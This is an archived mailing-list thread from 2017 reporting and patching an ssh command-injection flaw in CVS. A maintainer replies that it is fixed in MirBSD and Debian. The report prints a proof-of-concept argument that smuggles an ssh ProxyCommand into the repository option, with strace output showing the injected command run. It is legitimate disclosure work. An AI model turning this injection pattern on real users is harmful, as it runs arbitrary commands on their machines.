Google Groups no longer supports new Usenet posts or subscriptions. Historical content remains viewable.
Dismiss
CVS and ssh command injection (see CVE-2017-1000117, etc.)
4 views
Skip to first unread message
Hank Leininger
Aug 11, 2017, 9:15:38 AM8/11/17
to bug...@nongnu.org
Bugs in Git, Subversion, and Mercurial were just announced & patched
which allowed arbitrary local command execution if a malicious name was
used for the remote server, such as starting with - to pass options to
the ssh client:
git clone ssh://-oProxyCommand=some-command...
CVS has a similar problem with the -d option:
$ strace -f -e execve cvs -d '-oProxyCommand=id;localhost:/bar' co yada 2>&1 | egrep [^pu]id
execve("/usr/bin/cvs", ["cvs", "-d", "-oProxyCommand=id;localhost:/bar", "co", "yada"], 0x7ffe69f75a68 /* 139 vars */) = 0
[snip]
[pid 20003] execve("/usr/local/bin/ssh", ["ssh", "-oProxyCommand=id;localhost", "cvs server"], 0x5fb1fc8420 /* 141 vars */ ) = -1 ENOENT (No such file or directory)
[pid 20003] execve("/usr/bin/ssh", ["ssh", "-oProxyCommand=id;localhost", "cvs server"], 0x5fb1fc8420 /* 141 vars */) = 0
[pid 20004] execve("/bin/bash", ["/bin/bash", "-c", "exec id;localhost"], 0x32af5f10d0 /* 141 vars */) = 0
[pid 20004] execve("/usr/bin/id", ["id"], 0xec92226ae0 /* 141 vars */) = 0
ssh_exchange_identification: Connection closed by remote host
Tested vanilla CVS 1.12.13, and Gentoo CVS 1.12.12-r11.
Of course, the repo specification looks very odd, so tricking a victim
may be harder than for SCM tools where it's prefixed by an ssh://, or
masked behind a redirect, or submodule paths may be followed without
user interaction.
See also:
https://marc.info/?l=oss-security&m=150241876103454&w=2
https://marc.info/?l=subversion-announce&m=150238900328980&w=2
https://marc.info/?l=git&m=150238802328673&w=2
https://subversion.apache.org/security/CVE-2017-9800-advisory.txt
Thanks,
--
Hank Leininger <hl...@korelogic.com>
5F6D DCC8 FF53 8093 EC39 127B 091E 7F7C E898 E86C
which allowed arbitrary local command execution if a malicious name was
used for the remote server, such as starting with - to pass options to
the ssh client:
git clone ssh://-oProxyCommand=some-command...
CVS has a similar problem with the -d option:
$ strace -f -e execve cvs -d '-oProxyCommand=id;localhost:/bar' co yada 2>&1 | egrep [^pu]id
execve("/usr/bin/cvs", ["cvs", "-d", "-oProxyCommand=id;localhost:/bar", "co", "yada"], 0x7ffe69f75a68 /* 139 vars */) = 0
[snip]
[pid 20003] execve("/usr/local/bin/ssh", ["ssh", "-oProxyCommand=id;localhost", "cvs server"], 0x5fb1fc8420 /* 141 vars */ ) = -1 ENOENT (No such file or directory)
[pid 20003] execve("/usr/bin/ssh", ["ssh", "-oProxyCommand=id;localhost", "cvs server"], 0x5fb1fc8420 /* 141 vars */) = 0
[pid 20004] execve("/bin/bash", ["/bin/bash", "-c", "exec id;localhost"], 0x32af5f10d0 /* 141 vars */) = 0
[pid 20004] execve("/usr/bin/id", ["id"], 0xec92226ae0 /* 141 vars */) = 0
ssh_exchange_identification: Connection closed by remote host
Tested vanilla CVS 1.12.13, and Gentoo CVS 1.12.12-r11.
Of course, the repo specification looks very odd, so tricking a victim
may be harder than for SCM tools where it's prefixed by an ssh://, or
masked behind a redirect, or submodule paths may be followed without
user interaction.
See also:
https://marc.info/?l=oss-security&m=150241876103454&w=2
https://marc.info/?l=subversion-announce&m=150238900328980&w=2
https://marc.info/?l=git&m=150238802328673&w=2
https://subversion.apache.org/security/CVE-2017-9800-advisory.txt
Thanks,
--
Hank Leininger <hl...@korelogic.com>
5F6D DCC8 FF53 8093 EC39 127B 091E 7F7C E898 E86C
Thorsten Glaser
Aug 14, 2017, 3:13:11 AM8/14/17
to Hank Leininger, bug...@nongnu.org
Hank Leininger dixit:
>Of course, the repo specification looks very odd, so tricking a victim
>may be harder than for SCM tools where it's prefixed by an ssh://, or
It’s also immediately obvious and quite hard to exploit at all, I agree.
> https://marc.info/?l=oss-security&m=150241876103454&w=2
This was forwarded to me via Debian, and I fixed it in MirBSD and Debian
and wrote about it, publishing a patch:
http://www.mirbsd.org/permalinks/wlog-10_e20170811-tg.htm
Incidentally, CVS has too many mailing lists, I’m subscribed on some,
but not this one (I prefer having one list only, plus one for commits,
I’ve not fully taken over CVS upstream yet, though). But if you have
to deal with CVS again, feel free to Cc me or so.
Thanks,
//mirabilos
--
13:22⎜«neurodamage» mira, what's up man? I have a CVS question for you in #cvs
13:22⎜«neurodamage» since you're so good w. it │ «neurodamage:#cvs» i love you
13:28⎜«neurodamage:#cvs» you're a handy guy to have around for systems stuff ☺
16:06⎜<Draget:#cvs> Thank god I found you =) 20:03│«bioe007:#cvs» mira2k: ty
17:14⎜<ldiain:#cvs> Thanks big help you are :-) <bioe007> mira|nwt: ty again
18:35⎜«alturiak:#cvs» mirabilos: aw, nice. thanks :o
18:36⎜«ThunderChicken:#cvs» mirabilos FTW! 23:03⎜«mithraic:#cvs» aaah. thanks
18:41⎜«alturiak:#cvs» phew. thanks a bunch, guys. you just made my weekend :-)
18:10⎜«sumit:#cvs» mirabilos: oh ok.. thanks for that
21:57⎜<bhuey:#cvs> yeah, I really appreciate help
18:50⎜«grndlvl:#cvs» thankyou 18:50⎜«grndlvl:#cvs» worked perfectly
20:50⎜<paolo:#cvs> i see. mirabilos, thnks for your support
00:36⎜«halirutan:#cvs» ok, the obvious way:-) thx
18:44⎜«arcfide:#cvs» mirabilos, I am running OpenBSD. 18:59⎜«arcfide:#cvs»
Hrm, yes, I see what you mean. 19:01⎜«arcfide:#cvs» Yeah, thanks for the help.
21:33⎜«CardinalFang:#cvs» Ugh. Okay. Sorry for the dumb question. Thank you
21:34⎜<centosian:#cvs> mirabilos: whoa that's sweet
21:52⎜«garrett__:#cvs» much appreciated «garrett__:#cvs» thanks for your time
23:39⎜<symons:#cvs> this worked, thank you very much 16:26⎜<schweizer:#cvs> ok
thx, i'll try that 20:00⎜«stableable:#cvs» Thank you. 20:50⎜«s833:#cvs»
mirabilos: thanks a lot. 19:34⎜<bobbytek:#cvs> Thanks for confirming :)
20:08⎜<tsolox:#cvs> ...works like a charm.. thanks mirabilos
>Of course, the repo specification looks very odd, so tricking a victim
>may be harder than for SCM tools where it's prefixed by an ssh://, or
> https://marc.info/?l=oss-security&m=150241876103454&w=2
This was forwarded to me via Debian, and I fixed it in MirBSD and Debian
and wrote about it, publishing a patch:
http://www.mirbsd.org/permalinks/wlog-10_e20170811-tg.htm
Incidentally, CVS has too many mailing lists, I’m subscribed on some,
but not this one (I prefer having one list only, plus one for commits,
I’ve not fully taken over CVS upstream yet, though). But if you have
to deal with CVS again, feel free to Cc me or so.
Thanks,
//mirabilos
--
13:22⎜«neurodamage» mira, what's up man? I have a CVS question for you in #cvs
13:22⎜«neurodamage» since you're so good w. it │ «neurodamage:#cvs» i love you
13:28⎜«neurodamage:#cvs» you're a handy guy to have around for systems stuff ☺
16:06⎜<Draget:#cvs> Thank god I found you =) 20:03│«bioe007:#cvs» mira2k: ty
17:14⎜<ldiain:#cvs> Thanks big help you are :-) <bioe007> mira|nwt: ty again
18:35⎜«alturiak:#cvs» mirabilos: aw, nice. thanks :o
18:36⎜«ThunderChicken:#cvs» mirabilos FTW! 23:03⎜«mithraic:#cvs» aaah. thanks
18:41⎜«alturiak:#cvs» phew. thanks a bunch, guys. you just made my weekend :-)
18:10⎜«sumit:#cvs» mirabilos: oh ok.. thanks for that
21:57⎜<bhuey:#cvs> yeah, I really appreciate help
18:50⎜«grndlvl:#cvs» thankyou 18:50⎜«grndlvl:#cvs» worked perfectly
20:50⎜<paolo:#cvs> i see. mirabilos, thnks for your support
00:36⎜«halirutan:#cvs» ok, the obvious way:-) thx
18:44⎜«arcfide:#cvs» mirabilos, I am running OpenBSD. 18:59⎜«arcfide:#cvs»
Hrm, yes, I see what you mean. 19:01⎜«arcfide:#cvs» Yeah, thanks for the help.
21:33⎜«CardinalFang:#cvs» Ugh. Okay. Sorry for the dumb question. Thank you
21:34⎜<centosian:#cvs> mirabilos: whoa that's sweet
21:52⎜«garrett__:#cvs» much appreciated «garrett__:#cvs» thanks for your time
23:39⎜<symons:#cvs> this worked, thank you very much 16:26⎜<schweizer:#cvs> ok
thx, i'll try that 20:00⎜«stableable:#cvs» Thank you. 20:50⎜«s833:#cvs»
mirabilos: thanks a lot. 19:34⎜<bobbytek:#cvs> Thanks for confirming :)
20:08⎜<tsolox:#cvs> ...works like a charm.. thanks mirabilos
0 new messages